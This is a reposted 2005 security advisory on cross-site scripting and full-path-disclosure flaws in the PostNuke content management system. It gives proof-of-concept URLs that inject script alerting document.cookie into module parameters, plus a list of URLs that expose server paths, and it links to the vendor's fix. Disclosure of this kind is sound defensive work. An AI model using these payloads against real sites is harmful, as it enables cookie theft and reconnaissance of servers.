PostNuke XSS and Full path disclosure 0.760RC3=>x

2005.09.30
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-79

Hash: SHA1 [PostNuke XSS and Full path disclosure 0.760RC3=>x cXIb8O3.7] Author: Maksymilian Arciemowicz ( cXIb8O3 ) Date: 15.3.2005 from SECURITYREASON.COM - --- 0.Description --- PostNuke: The Phoenix Release (0.750) and (0.760RC3) PostNuke is an open source, open developement content management system (CMS). PostNuke started as a fork from PHPNuke (http://www.phpnuke.org) and provides many enhancements and improvements over the PHP-Nuke system. PostNuke is still undergoing development but a large number of core functions are now stabilising and a complete API for third-party developers is now in place. If you would like to help develop this software, please visit our homepage at http://noc.postnuke.com/ You can also visit us on our IRC Server irc.postnuke.com channel #postnuke-support #postnuke-chat #postnuke Or at the Community Forums located at: http://forums.postnuke.com/ - --- 1. Cross Site Scripting --- 1.0 http://[HOST]/[DIR]/modules/Xanthia/pnhtml/demo.php?skin=%3C/script%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E http://[HOST]/[DIR]/modules/Xanthia/pnhtml/demo.php?paletteid=%3C/script%3E%3Cscript%3Ealert(document.cookie)%3C/script% 3E etc. 1.1 If you can see php error and register global = On http://[HOST]/[DIR]/modules/Multisites/installation/config.php?serverName=<H1>SUICIDE</H1> or for 0.750 http://[HOST]/[DIR]/modules/NS-Multisites/installation/config.php?serverName=<H1>SUICIDE</H1> - --- 2. Full path disclosure --- 2.0 http://[HOST]/[DIR]/modules/Xanthia/pndocs/themes/theme.php Error message : - --------------- Warning: main(/home/kellan/projs/magpierss/scripts/Smarty/Smarty.class.php) [function.main]: failed to open stream: No such file or directory in /www/PostNuke-0.760-RC3/html/modules/RSS/pnincludes/scripts/simple_smarty.php on line 8 Fatal error: main() [function.require]: Failed opening required '/home/kellan/projs/magpierss/scripts/Smarty/Smarty.class.php' (include_path='.:') in /www/PostNuke-0.760-RC3/html/modules/RSS/pnincludes/scripts/simple_smarty.php on line 8 - --------------- 2.1 http://[HOST]/[DIR]/modules/Xanthia/pnclasses/Xanthia.php Error message : - --------------- Fatal error: Call to undefined function pnModGetVar() in /www/PostNuke-0.760-RC3/html/modules/Xanthia/pnclasses/Xanthia.php on line 48 - --------------- 2.2 http://[HOST]/[DIR]/modules/Blocks/pnblocks/user.php http://[HOST]/[DIR]/modules/Blocks/pnblocks/thelang.php http://[HOST]/[DIR]/modules/Blocks/pnblocks/text.php http://[HOST]/[DIR]/modules/Blocks/pnblocks/html.php http://[HOST]/[DIR]/modules/Blocks/pnblocks/menu.php http://[HOST]/[DIR]/modules/Blocks/pnblocks/finclude.php http://[HOST]/[DIR]/modules/Blocks/pnblocks/button.php Error message : - --------------- Fatal error: Call to undefined function pnSecAddSchema() in /www/PostNuke-0.760-RC3/html/modules/Blocks/pnblocks/button.php on line 48 - --------------- 2.3 http://[HOST]/[DIR]/modules/NS-Multisites/installation/config.php or for 0.760RC3 http://[HOST]/[DIR]/modules/Multisites/installation/config.php Error message : - --------------- Warning: main(parameters/whoisit.inc.php) [function.main]: failed to open stream: No such file or directory in /www/PostNuke-0.750/html/modules/NS-Multisites/installation/config.php on line 2 Warning: main() [function.include]: Failed opening 'parameters/whoisit.inc.php' for inclusion (include_path='.:') in /www/PostNuke-0.750/html/modules/NS-Multisites/installation/config.php on line 2 - --------------- 2.4 http://[HOST]/[DIR]/xmlrpc.php Error message : - --------------- Fatal error: Cannot redeclare xmlrpc_decode() in /www/PostNuke-0.760-RC3/html/modules/xmlrpc/lib/xmlrpc.inc on line 1068 - --------------- - --- 3. How to fix --- PNSA 2005-2 Security Fix (changed files only) for PostNuke 0.750 (tar.gz format) http://news.postnuke.com/Downloads-index-req-viewdownloaddetails-lid-471.html SHA1: 6e76d92124c833618d02dfdb87d699374120967d MD5: a007e741be11389a986b1d8928a6c0e5 Size: 160550 Bytes or CVS - --- 4.Contact --- Author: Maksymilian Arciemowicz

References:

http://news.postnuke.com/Downloads-index-req-viewdownloaddetails-lid-471.html


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2018, cxsecurity.com

 

Back to Top